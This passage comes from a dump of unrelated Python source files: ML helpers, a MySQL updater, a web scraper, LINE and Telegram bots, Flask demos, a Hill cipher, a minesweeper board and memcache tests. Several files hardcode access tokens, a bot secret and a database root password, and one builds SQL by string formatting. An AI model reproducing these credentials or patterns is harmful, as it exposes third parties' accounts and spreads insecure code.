Shape: (batch_size, dim).\n\n batch_size: int\n number of training images in the batch\n \"\"\"\n batch_size, dim = x.shape\n x = x.view(batch_size, 1, dim)\n mu = mu.view(1, batch_size, dim)\n logvar = logvar.view(1, batch_size, dim)\n return log_density_gaussian(x, mu, logvar)\n\n\ndef log_density_gaussian(x, mu, logvar):\n \"\"\"Calculates log density of a Gaussian.\n\n Parameters\n ----------\n x: torch.Tensor or np.ndarray or float\n Value at which to compute the density.\n\n mu: torch.Tensor or np.ndarray or float\n Mean.\n\n logvar: torch.Tensor or np.ndarray or float\n Log variance.\n \"\"\"\n normalization = - 0.5 * (math.log(2 * math.pi) + logvar)\n inv_var = torch.exp(-logvar)\n log_density = normalization - 0.5 * ((x - mu)**2 * inv_var)\n return log_density\n\n\ndef log_importance_weight_matrix(batch_size, dataset_size):\n \"\"\"\n Calculates a log importance weight matrix\n\n Parameters\n ----------\n batch_size: int\n number of training images in the batch\n\n dataset_size: int\n number of training images in the dataset\n \"\"\"\n N = dataset_size\n M = batch_size - 1\n strat_weight = (N - M) / (N * M)\n W = torch.Tensor(batch_size, batch_size).fill_(1 / M)\n W.view(-1)[::M + 1] = 1 / N\n W.view(-1)[1::M + 1] = strat_weight\n W[M - 1, 0] = strat_weight\n return W.log()\n","sub_path":"trainers/loss_helpers.py","file_name":"loss_helpers.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"290459464","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : update_host_code.py\n# @Author: Cedar\n# @Date : 2020/5/22\n# @Desc :\n\n\nimport model.lib.common as common\nimport pymysql\n\n\ndef update_host_code():\n # 连接mysql\n config = {\n 'host': '192.168.1.118',\n 'port': 3306,\n 'user': 'root',\n 'passwd': 'poms@db',\n 'db': 'mymonitor',\n 'charset': 'utf8mb4',\n 'cursorclass': pymysql.cursors.DictCursor\n }\n\n # 1.查询操作\n # 编写sql 查询语句\n select_sql = \"select Column_Link_ID,URL from column_link where host_code is null limit 1000;\"\n # update_sql = \"update column_link set host_code='{}' where Column_Link_ID={};\"\n update_sql_pattern = \"UPDATE column_link SET host_code = CASE Column_Link_ID {} END WHERE Column_Link_ID IN {};\"\n when_then_pattern = \" WHEN {} THEN '{}' \"\n id_list = []\n try:\n results = common.query_mysql(config, select_sql) # 获取查询的所有记录\n\n when_then = \"\"\n # 遍历结果\n for row in results:\n Column_Link_ID = row['Column_Link_ID']\n url = row['URL']\n host_code = common.get_host_code(url)\n if len(host_code) > 50:\n continue\n # sql = update_sql.format(host_code, Column_Link_ID)\n when_then = when_then + when_then_pattern.format(Column_Link_ID, host_code)\n id_list.append(Column_Link_ID)\n\n id_tuple = tuple(id_list)\n sql = update_sql_pattern.format(when_then, id_tuple)\n print(sql)\n try:\n common.query_mysql(config, sql)\n except Exception as e:\n print(e)\n\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n for i in range(31481):\n update_host_code()\n # time.sleep(1)\n","sub_path":"tool/temp/update_host_code.py","file_name":"update_host_code.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22882029","text":"import pandas as pd\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup\n\nexecutable_path = {'executable_path': '/usr/local/bin/chromedriver'}\nbrowser = Browser('chrome', **executable_path, headless=False)\n\n# Function to 
grab ingredients and instructions from rabbit and wolves inner-page\ndef grab_details_hbh(url):\n\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n recipe_ingredients_detail = soup.find_all('li', attrs={'class': 'wprm-recipe-ingredient'})\n ingredients_list = []\n\n for ingredients in recipe_ingredients_detail:\n ingredients_list.append(ingredients.text)\n\n recipe_instructions_detail = soup.find_all('li', attrs={'class': 'wprm-recipe-instruction'})\n instructions_list = []\n\n for instruction in recipe_instructions_detail:\n instructions_list.append(instruction.text)\n\n # Extract Image\n post_content = soup.find(\"div\", attrs={\"class\": \"post-content\"}).find_all_next(\"img\")\n image_list = []\n for img in post_content:\n try:\n if img['alt']:\n string = str(img['alt'])\n if \"horizontal photo\" in string:\n image = img['data-src']\n image_list.append(image)\n\n except Exception as e:\n pass\n\n return ingredients_list, instructions_list, image_list\n\n# Function to grab link from half baked harvest recipes page\ndef halfbakedharvest():\n\n my_dict = {}\n\n url = 'https://www.halfbakedharvest.com/category/recipes/'\n browser.visit(url)\n\n for x in range(1, 10):\n\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n recipes = soup.find_all('a', class_='recipe-block')\n\n for recipe in recipes:\n\n recipe_link = recipe['href']\n my_dict[recipe.img['title']] = [recipe_link]\n\n # Iterate through to the next page\n browser.visit(f\"{url}page/{x}/\")\n\n for recipe_name in my_dict:\n\n link = my_dict[recipe_name]\n details = grab_details_hbh(link[0])\n ingredients, instructions, image = details\n\n my_dict[recipe_name].append(ingredients)\n my_dict[recipe_name].append(instructions)\n if image:\n my_dict[recipe_name].append(image[0])\n else:\n print(\"Image not found!\")\n\n print(my_dict)\n\n return my_dict\n\ndict = halfbakedharvest()\n\ndf = pd.DataFrame(dict.values(), index=dict.keys(), columns=['Link', 'Ingredients', 'Instructions', \"Image\"])\n\nprint(df.head())\n\ndf.to_excel(\"/Users/garretteichhorn/Desktop/github_repos/recipe_generator/excel_files/halfbakedharvest_recipes.xlsx\")\n","sub_path":"recipe_app/02 - web_scraping/halfbakedharvest_recipes.py","file_name":"halfbakedharvest_recipes.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"204114980","text":"import tensorflow as tf\nimport keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom keras import utils as np_utils\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom PIL import Image\n\npath_x = 'Data\\\\x\\\\'\npath_y1 = 'Data\\\\y1\\\\'\npath_y2 = 'Data\\\\y2\\\\'\nimg_size = [576,778]\n\nimlist = os.listdir(path_x)[:500]\nnum_samples = len(imlist)\n\n'''\n#Test if the numpy array is correctly read\nim1 = np.load(path_x + imlist[0])\nplt.imshow(im1)\nplt.show()\n'''\n\nimmatrix = np.array([np.load(path_x + file_name).flatten() for file_name in imlist],'f')\nlabel = np.array([np.load(path_y1 + file_name).flatten() for file_name in imlist],'f')\n\ndata,Label = shuffle(immatrix,label,random_state = 2)\ntrain_data = [data,Label]\nprint('x_train shape, y_train shape:\\t',train_data[0].shape,train_data[1].shape)\n\n'''\n#Test if the numpy array is correctly read\nimg = train_data[0][20].reshape(img_size[1],img_size[0])\nplt.imshow(img)\nplt.show()\n'''\n\nbatch_size = 20\nnum_classes = 2\nnum_epochs = 
20\nnum_channels = 1\nnum_filters = 4\nnum_pool = 2\nkernel_size = 3\n\n(X,y) = (train_data[0],train_data[1])\nx_train,x_test,y_train,y_test = train_test_split(X, y, test_size = 0.2, random_state = 4)\n# process train and test input data\nx_train = x_train.reshape(x_train.shape[0],img_size[1],img_size[0])\nx_train = x_train.astype('float32')\nx_train /= 255  # scale 8-bit pixel values to [0, 1]\nx_test = x_test.reshape(x_test.shape[0],img_size[1],img_size[0])\nx_test = x_test.astype('float32')\nx_test /= 255\n\n#y_train = np_utils.to_categorical(y_train,num_classes)\n#y_test = np_utils.to_categorical(y_test,num_classes)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=((img_size[1],img_size[0]))))\nmodel.add(keras.layers.Dense(256, activation=tf.nn.relu))\nmodel.add(keras.layers.Dropout(0.2))\nmodel.add(keras.layers.Dense(1))\n\noptimizer = tf.train.RMSPropOptimizer(0.001)\nmodel.compile(loss='mse',\n              optimizer=optimizer,\n              metrics=['mae'])\n\nmodel.fit(x_train, y_train, epochs=num_epochs)\nprint('train:',model.evaluate(x_train, y_train))\nprint('test:',model.evaluate(x_test, y_test))\nmodel.save('v0.1')\n#plot\n\ndef plot_image(i, predictions_array, true_label, img):\n\tprediction, true_label, img = predictions_array[i], true_label[i],\\\n\t img[i].reshape((img_size[1],img_size[0]))\n\tplt.grid(False)\n\tplt.xticks([])\n\tplt.yticks([])\n\tplt.imshow(img)\n\tplt.xlabel(\"{} ({})\".format(prediction[0],true_label),\n                color='black')\n\tplt.show()\n\npredictions = model.predict(x_test)\nfor i in range(99):\n\tplot_image(i, predictions, y_test, x_test)","sub_path":"train_regression.py","file_name":"train_regression.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"625461786","text":"import os, re, json\nfrom datetime import datetime, date, timedelta\nfrom flask import Flask, request, abort\nfrom textblob import TextBlob\nimport requests\nfrom linebot import (\n    LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n    InvalidSignatureError\n)\nfrom linebot.models import (\n    MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\n\nline_bot_api = LineBotApi('6YUtLz3LrrEPOMnxZLiZLS8lqkK6cEFIlbgqlNJ5BfwjYlV47vkbgDpanyR7UYXfFwn3+5IEvxgEIQX3SrB462J9/FrwEXO1vllaiL5jbcfU4daqLE7GIwflVOG+KXc1Bv5JquQ1fbAZlpbIASGG3AdB04t89/1O/w1cDnyilFU=')\nhandler = WebhookHandler('a43d81c39b3638058ee9e84194da780d')\n\n@app.route('/')\ndef homepage():\n    the_time = datetime.now().strftime(\"%A, %d %b %Y %l:%M %p\")\n\n    return \"\"\"\n
    Hello Translator-Bot\n    It is currently {time}.
    \n \"\"\".format(time=the_time)\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\ndef translate_text(text): \n tb = TextBlob(text) \n lang = tb.detect_language()\n trans_text = \"\"\n if lang == \"en\": \n trans_text = str(tb.translate(to='vi'))\n else:\n trans_text = str(tb.translate(to='en')) \n return trans_text\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n text = event.message.text \n if text == \"\" or \"#\" in text or len(text) < 4:\n return\n else: \n translated = translate_text(event.message.text) \n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(translated))\n \n\nif __name__ == \"__main__\":\n app.run(debug=True, use_reloader=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"319297974","text":"from flask import Flask, render_template, request\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return 'Index Page'\n\n@app.route('/hello')\ndef hello(name='Robin'):\n name = name.lower()\n return render_template('hello.html', name=name)\n\n@app.route('/features', methods = ['POST'])\ndef features():\n text = \"Amazing grace how sweet the sound\"\n textlength = len(text)\n return render_template('features.html', name = textlength, msg = text)\n\n\n@app.route('/textr', methods = ['GET', 'POST'])\ndef my_form():\n return render_template(\"my-form.html\")\n\n@app.route('/textr', methods = ['POST'])\ndef my_form_post():\n\n text = request.form['text']\n processed_text = text.upper()\n return processed_text\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","sub_path":"flasksite/begin.py","file_name":"begin.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569203175","text":"import cv2 as cv\nimport numpy as np\nfrom datetime import datetime\n\n# Create a VideoCapture object\ncap = cv.VideoCapture(0,cv.CAP_DSHOW)\npath='output_'+str(datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\"))+'.mp4'\n# Check if camera opened successfully\nif (cap.isOpened() == False): \n print(\"Unable to read camera feed\")\n \n# Default resolutions of the frame are obtained.The default resolutions are system dependent.\n# We convert the resolutions from float to integer.\nframe_width = int(cap.get(3))\nframe_height = int(cap.get(4))\nprint('[INFO] Frame size : '+str(frame_width)+', '+str(frame_height))\nprint('[INFO] Path write : '+str(path))\nprint('[INFO] Press \\\"q\\\" to end the capture')\n# Define the codec and create VideoWriter object.The output is stored in 'outpy.avi' file.\nout = cv.VideoWriter(path,cv.VideoWriter_fourcc(*'mp4v'), 10, (frame_width,frame_height))\nwhile(True):\n ret, frame = cap.read()\n \n if ret == True: \n \n # Write the frame into the file 'output.avi'\n out.write(frame)\n \n # Display the resulting frame \n cv.imshow('frame',frame)\n \n # Press Q on keyboard to stop recording\n if cv.waitKey(1) & 0xFF == ord('q'):\n break\n \n # Break the loop\n else:\n break \n \n# When everything done, release the video capture and 
video write objects\ncap.release()\nout.release()\n \n# Closes all the frames\ncv.destroyAllWindows() ","sub_path":"recordVideo.py","file_name":"recordVideo.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"299511931","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, String, Integer, Text\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('mysql://root@localhost:3307/niputv_activity?charset=utf8')\nBase = declarative_base()\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nclass Playrecording(Base):\n\n __tablename__ = 'playrecording'\n\n id = Column(Integer, primary_key=True)\n ip = Column(Text)\n vid = Column(Text)\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)","sub_path":"app/db/createtab.py","file_name":"createtab.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"40300821","text":"# -*- coding: utf-8 -*-\n\n# Created on 2017-11-28\n# author: 欧度智能,https://www.odooai.cn\n# email: 300883@qq.com\n# resource of odooai\n# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).\n\n# Odoo16在线用户手册(长期更新)\n# https://www.odooai.cn/documentation/16.0/zh_CN/index.html\n\n# Odoo16在线开发者手册(长期更新)\n# https://www.odooai.cn/documentation/16.0/zh_CN/developer.html\n\n# Odoo13在线用户手册(长期更新)\n# https://www.odooai.cn/documentation/user/13.0/zh_CN/index.html\n\n# Odoo13在线开发者手册(长期更新)\n# https://www.odooai.cn/documentation/13.0/index.html\n\n# Odoo在线中文用户手册(长期更新)\n# https://www.odooai.cn/documentation/user/10.0/zh_CN/index.html\n\n# Odoo10离线中文用户手册下载\n# https://www.odooai.cn/odoo10_user_manual_document_offline/\n# Odoo10离线开发手册下载-含python教程,jquery参考,Jinja2模板,PostgresSQL参考(odoo开发必备)\n# https://www.odooai.cn/odoo10_developer_document_offline/\n# description:\n\nfrom odoo import api, fields, models, exceptions, _\n\nclass ProductCategory(models.Model):\n _inherit = 'product.category'\n\n # 更新 complete_name 算法,当有context: show_short =1 时,只显示短名\n def name_get(self):\n if self._context.get('show_short'):\n new_res = []\n for category in self:\n name = category.name\n new_res.append((category.id, name))\n return new_res\n else:\n return super(ProductCategory, self).name_get()\n","sub_path":"app_website_product_superbar/models/product_category.py","file_name":"product_category.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589517203","text":"import json\nimport requests\nimport urllib\nimport schedule\n\n\nTOKEN = \"429105357:AAHs2gkeSxYljcm8UkKRoM9lmDyJ7DPqj6g\"\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\n\n\ndef send_http_get_req(req_url):\n response = requests.get(req_url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = send_http_get_req(url)\n js = json.loads(content)\n return js\n\n\ndef get_bot_information():\n url = URL + \"getMe\"\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return text, chat_id\n\n\ndef send_message(text, chat_id):\n text = 
urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}\".format(text, chat_id)\n send_http_get_req(url)\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=2\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef parse_message(updates):\n for update in updates[\"result\"]:\n try:\n text = (update[\"message\"][\"text\"]).rstrip().lower()\n chat = update[\"message\"][\"chat\"][\"id\"]\n except Exception as e:\n print(e)\n return text, chat\n\n\ndef send_forgot(text, chat_id):\n url = URL + \"sendMessage?text={}&chat_id={}\".format(\"Take a pill! \" + text, chat_id)\n send_http_get_req(url)\n\n\ndef send_reminder(text, chat_id):\n url = URL + \"sendMessage?text={}&chat_id={}\".format(\"Take a pill! \" + text, chat_id)\n send_http_get_req(url)\n schedule.every(5).minutes.do(send_forgot, text + \" don't forget\").tag('forgot')\n","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"586469787","text":"import random\n\nfrom vec2d import Vec2D\nfrom sprite import SpriteGroup\nfrom cell import Cell\nfrom tileset import Tileset\nfrom settings import *\n\n\nclass Board(SpriteGroup):\n def __init__(self, size, mines, tileset=DEFAULT_TILESET, *sprites):\n super(Board, self).__init__(*sprites)\n\n self.size = size\n self.mines = mines\n\n assert self.mines <= self.size[0] * self.size[1], \\\n 'The number of mines should be at most equal to\\\n the number of cells on the board.'\n\n self.tileset = Tileset(TILESET_PATH + tileset)\n Cell.tileset = self.tileset\n\n self.cells = [[Cell() for column in range(self.size[1])]\n for row in range(self.size[0])]\n self.position = Vec2D((DEFAULT_SCREEN_SIZE[0] -\n self.size[0] * self.tileset.tile_side) / 2,\n (DEFAULT_SCREEN_SIZE[1] -\n self.size[1] * self.tileset.tile_side) / 2)\n\n for row_index, row in enumerate(self.cells):\n for column_index, cell in enumerate(row):\n cell.position = (self.position +\n Vec2D(self.tileset.tile_side * column_index,\n self.tileset.tile_side * row_index))\n self.add(cell)\n\n self._init_mines()\n self._init_values()\n\n def __getitem__(self, key):\n return self.cells[key]\n\n def __iter__(self):\n for row in self.cells:\n for cell in row:\n yield cell\n\n def _init_mines(self):\n rows = self.size[0]\n columns = self.size[1]\n placed_mines = 0\n\n while placed_mines < self.mines:\n random_row = random.randint(0, rows-1)\n random_column = random.randint(0, columns-1)\n\n if self.cells[random_row][random_column].value != CELL_VALUES.MINE:\n self.cells[random_row][random_column].value = CELL_VALUES.MINE\n placed_mines += 1\n\n def _init_values(self):\n for row_index, row in enumerate(self.cells):\n for column_index, cell in enumerate(row):\n if cell.value != CELL_VALUES.MINE:\n cell.value = self._adjacent_mines(row_index, column_index)\n\n def _adjacent_mines(self, row, column):\n surrounding_cells = [(row-1, column), (row, column-1), (row+1, column),\n (row, column+1), (row-1, column+1),\n (row+1, column+1), (row-1, column-1),\n (row+1, column-1)]\n surrounding_mines = 0\n for cell in surrounding_cells:\n surrounding_mines += (cell[0] >= 0 and cell[0] < self.size[0] and\n cell[1] >= 0 and cell[1] < self.size[1] and\n 
(self.cells[cell[0]][cell[1]].value ==\n CELL_VALUES.MINE))\n return surrounding_mines\n\n def _adjacent_empty_cells(self, row, column):\n surrounding_cells = [(row-1, column), (row, column-1), (row+1, column),\n (row, column+1), (row-1, column+1),\n (row+1, column+1), (row-1, column-1),\n (row+1, column-1)]\n\n if self.cells[row][column].state == CELL_STATES.CLOSED:\n self.cells[row][column].state = CELL_STATES.OPEN\n\n if (self.cells[row][column].value not in\n [CELL_VALUES.MINE, CELL_VALUES.ZERO]):\n return\n\n for cell in surrounding_cells:\n if (cell[0] >= 0 and cell[0] < self.size[0] and cell[1] >= 0 and\n cell[1] < self.size[1] and\n self.cells[cell[0]][cell[1]].state == CELL_STATES.CLOSED):\n self._adjacent_empty_cells(*cell)\n\n def update(self, events):\n for event in events:\n if event.type == pygame.MOUSEBUTTONDOWN:\n cell = self.get_cell(*event.pos)\n\n if cell is not None:\n if event.button == MOUSE_BUTTONS.LEFT:\n cell.open()\n if cell.value == CELL_VALUES.ZERO:\n self._adjacent_empty_cells(*self.get_coords(cell))\n elif event.button == MOUSE_BUTTONS.RIGHT:\n cell.flag_unflag()\n\n super(Board, self).update()\n\n def get_cell(self, x_pixels, y_pixels):\n cell_x = int((x_pixels - self.position.x) / TILE_SIZE[0])\n cell_y = int((y_pixels - self.position.y) / TILE_SIZE[1])\n\n if (cell_x >= 0 and cell_x < self.size[0] and cell_y >= 0 and\n cell_y < self.size[1]):\n return self.cells[cell_y][cell_x]\n else:\n return None\n\n def get_coords(self, cell):\n for row_index, row in enumerate(self.cells):\n for column_index, possible_cell in enumerate(row):\n if possible_cell is cell:\n return (row_index, column_index)\n\n def reveal(self):\n for cell in self:\n cell.state = CELL_STATES.OPEN\n\n def set_position(self, position):\n for cell in self:\n cell.position += position - self.position\n\n self.position = position\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"641566748","text":"import numpy as np \n#-----------------------------------------------CIFRADO--------------------------------------------------\npalabra = input(\"Ingrese palabra a cifrar: \")\nprint(\"-------------------CIFRADO----------------------\")\nprint(palabra+\"\\n\")\nnumero = [ord(entrada)-48 for entrada in palabra]\ncifrado_p1 = [75 if mov==-16 else mov for mov in numero]\ncorrector = 0\nwhile corrector == 0:# Esto pondra 0 en los espacios faltantes del mensaje\n if len(cifrado_p1)%3 != 0:\n cifrado_p1 = cifrado_p1 + [76]\n else: \n corrector = 1 \nfilas = int(len(cifrado_p1)/3)\nprint(\"La clave es:\")\nllave = np.array([[5, 8, 1],[2, 3, 4],[9, 6, 2]])\nprint(llave)\nmatriz = np.array(cifrado_p1).reshape(filas,3)\nmatriz_code = [np.array(np.dot(matriz[pivote,:],llave)).tolist() for pivote in range(filas)]\nlista_lista = [(matriz_code[uno][dos])%76 for uno in range(filas) for dos in range(3)]\npal_cifra = [chr(num+48) for num in lista_lista]\nunion = ''.join(pal_cifra)\nprint(\"\\n\\npalabra cifrada es\\n\")\nprint(union)","sub_path":"Com2_/hill_1.py","file_name":"hill_1.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88274895","text":"# https://leetcode.com/problems/intersection-of-two-linked-lists/\nimport unittest\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, 
headB: ListNode) -> ListNode:\n        if not headA or not headB:\n            return None\n        pt1 = headA\n        pt2 = headB\n        pt1_len, pt1end = self.get_len(headA)\n        pt2_len, pt2end = self.get_len(headB)\n        if pt1end != pt2end:\n            return None\n\n        if pt1_len < pt2_len:\n            for i in range(pt2_len - pt1_len):\n                pt2 = pt2.next\n        else:\n            for i in range(pt1_len - pt2_len):\n                pt1 = pt1.next\n\n        while pt1 and pt2:\n            if pt1 == pt2:\n                return pt1\n            pt1 = pt1.next\n            pt2 = pt2.next\n\n    def get_len(self, pointer):\n        # Walk the list once, counting nodes and remembering the tail node so\n        # the caller can compare tails to rule out non-intersecting lists early.\n        num = 0\n        end = None\n        while pointer:\n            end = pointer\n            pointer = pointer.next\n            num += 1\n        return num, end\n\n\ndef set_up(arrA, arrB, arrC):\n    if arrA != []:\n        headA = ListNode(arrA[0])\n        tempA = headA\n        for a in arrA[1:]:\n            tempA.next = ListNode(a)\n            tempA = tempA.next\n    else:\n        headA = ListNode(None)\n        tempA = headA\n    if arrB != []:\n        headB = ListNode(arrB[0])\n        tempB = headB\n        for b in arrB[1:]:\n            tempB.next = ListNode(b)\n            tempB = tempB.next\n    else:\n        headB = ListNode(None)\n        tempB = headB\n\n    conC = ListNode(arrC[0])\n    tempC = conC\n    for c in arrC[1:]:\n        tempC.next = ListNode(c)\n        tempC = tempC.next\n    tempA.next = conC if tempA.val else None\n    tempB.next = conC if tempB.val else None\n    return headA, headB, conC\n\n\nclass TestIntersect(unittest.TestCase):\n    def test_empty(self):\n        headA, headB, _ = set_up([], [1, 2, 3], [4, 5])\n        self.assertEqual(Solution().getIntersectionNode(headA, headB), None)\n        self.assertEqual(Solution().getIntersectionNode(\n            ListNode(None), ListNode(None)), None)\n\n    def test_intersect(self):\n        # same length\n        headA, headB, con = set_up([1, 2, 3], [4, 5, 6], [7, 8, 9])\n        self.assertEqual(Solution().getIntersectionNode(headA, headB), con)\n        # longer headA\n        headA, headB, con = set_up([1, 2, 3, 4], [5, 6], [7, 8, 9])\n        self.assertEqual(Solution().getIntersectionNode(headA, headB), con)\n        # longer headB\n        headA, headB, con = set_up([1, 2], [3, 4, 5, 6], [7, 8, 9])\n        self.assertEqual(Solution().getIntersectionNode(headA, headB), con)\n\n\ndef main():\n    # headA, headB = set_up([4, 1], [5, 6, 1], [8, 4, 5])\n    # sol = Solution()\n    # print(sol.getIntersectionNode(headA, headB).val)\n    unittest.main()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Easy/Intersection_of_Two_Linked_Lists.py","file_name":"Intersection_of_Two_Linked_Lists.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"258178320","text":"\"\"\"\n    test_multicache.py\n\n    PURPOSE\n    Tests the multicache library -- a wrapper for memcache that allows for\n    the storage of arbitrarily large objects\n\n    NOTES\n    If you change test class name, be sure to update in main block at bottom.\n    _create_suite\n\n    REFERENCES\n\n    LICENSE\n    Tom at klenwell@gmail.com\n    some rights reserved, 2011\n\"\"\"\n#\n# Imports\n#\n# Python Imports\nimport sys, os, pdb, logging\nfrom os.path import (abspath, dirname, join as osjoin, exists)\nfrom datetime import(datetime, date, timedelta)\nfrom random import (randint, choice, sample)\nimport hashlib\n\n# Extend sys.path\nPROJECT_PATH = abspath(osjoin(dirname(__file__), '../..'))\nif PROJECT_PATH not in sys.path:\n    sys.path.append(PROJECT_PATH)\n\n# App Engine Imports\nfrom google.appengine.ext import (testbed, db)\n\n# Appswell Imports\nfrom framework.lib.testing import (AppswellUnitTest, run_test_from_command_line)\nfrom framework.lib import (multicache)\n\n\n#\n# Module Parameters\n#\n# Test Configuration\nTEST_CONFIG = {\n    'BREAK'   : False,\n    'VERBOSE' : False,\n}\n\n# Exception Classes\nclass TemplateException(Exception): 
pass\n\n\n#\n# Test Class\n#\nclass MulticacheTest(AppswellUnitTest):\n\n #\n # Harness\n #\n def setUp(self):\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n self.testbed.init_datastore_v3_stub()\n self.testbed.init_memcache_stub()\n\n def tearDown(self):\n self.testbed.deactivate()\n\n def get_cache_data(self, num_items):\n cache_data = {}\n\n for i in range(num_items):\n key = 'key_%s' % (i)\n value = hashlib.md5(str(i)).hexdigest()\n cache_data[key] = value\n\n return cache_data\n\n #\n # Unit Tests\n #\n def test_shallow_deep_object(self):\n \"\"\"a dict of a 60 items, each a dict of 20000 items\"\"\"\n # cache params\n cache_key = 'test_shallow_deep_object'\n cache_len = 60\n num_items = 3\n num_sub_items = 20000\n\n # prepare cache data and save\n cache_data = {}\n for n in range(num_items):\n cache_data[n] = self.get_cache_data(num_sub_items)\n multicache.set(cache_key, cache_data, cache_len)\n\n # retrieve data\n retrieved_data = multicache.get(cache_key)\n\n # test\n self.assertEqual(cache_data[2].items().sort(),\n retrieved_data[2].items().sort())\n self.assertEqual(cache_data.keys().sort(), retrieved_data.keys().sort())\n\n def test_complex_multi_cache(self):\n \"\"\"a dict of a 5000 items, each a dict of 20 items\"\"\"\n # cache params\n cache_key = 'test_complex_multi_cache'\n cache_len = 60\n num_items = 5000\n num_sub_items = 20\n\n # prepare cache data and save\n cache_data = {}\n for n in range(num_items):\n cache_data[n] = self.get_cache_data(num_sub_items)\n multicache.set(cache_key, cache_data, cache_len)\n\n # retrieve data\n retrieved_data = multicache.get(cache_key)\n\n # test\n logging.info([cache_data[1000], retrieved_data[1000]])\n self.assertEqual(cache_data[1000].items().sort(),\n retrieved_data[1000].items().sort())\n self.assertEqual(cache_data.keys().sort(), retrieved_data.keys().sort())\n\n def test_multi_cache(self):\n \"\"\"this should just save using memcache\"\"\"\n # cache params\n cache_key = 'test_multi_cache'\n cache_len = 60\n num_items = 20000\n\n # prepare cache data and save\n cache_data = self.get_cache_data(num_items)\n multicache.set(cache_key, cache_data, cache_len)\n\n # retrieve data\n retrieved_data = multicache.get(cache_key)\n\n # test\n self.assertEqual(cache_data.keys().sort(), retrieved_data.keys().sort())\n\n def test_simple_multi_cache(self):\n \"\"\"this should just save using memcache\"\"\"\n # cache params\n cache_key = 'test_simple_multi_cache'\n cache_len = 60\n\n # prepare cache data and save\n cache_data = self.get_cache_data(5000)\n multicache.set(cache_key, cache_data, cache_len)\n\n # retrieve data\n retrieved_data = multicache.get(cache_key)\n\n # test\n self.assertEqual(cache_data.keys().sort(), retrieved_data.keys().sort())\n\n def test_split_string_into_parts(self):\n num_parts = 3\n test_cases = [\n ('123456789012345678901234567890', ['1234567890'] * 3),\n ('1234567890', ['123', '456', '7890']),\n ]\n for case in 